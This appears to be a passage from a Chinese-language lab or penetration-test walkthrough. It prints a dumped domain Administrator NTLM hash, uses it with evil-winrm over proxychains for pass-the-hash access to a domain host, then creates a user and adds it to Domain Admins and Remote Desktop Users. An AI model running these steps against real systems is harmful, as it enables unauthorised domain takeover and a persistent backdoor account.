从151获取域管的hash:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48989de6a73f952ad51adceabc13cc9c:::
proxychains4 evil-winrm -u [tricky.com](<http://tricky.com/>)\\\\administrator -H 48989de6a73f952ad51adceabc13cc9c -i 172.16.64.150
增加一个用户,并加入域管理员组和远程桌面组。
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> **net user crack Passw0rd! /add /domain**
[proxychains] Strict chain ... 127.0.0.1:1088 ... 172.16.64.150:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1088 ... 172.16.64.150:5985 ... OK
The command completed successfully.
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> **net localgroup "Remote Desktop Users" crack /add /domain**
[proxychains] Strict chain ... 127.0.0.1:1088 ... 172.16.64.150:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1088 ... 172.16.64.150:5985 ... OK
The command completed successfully.
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> **net group "domain admins" crack /add /domain**
The command completed successfully.
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop>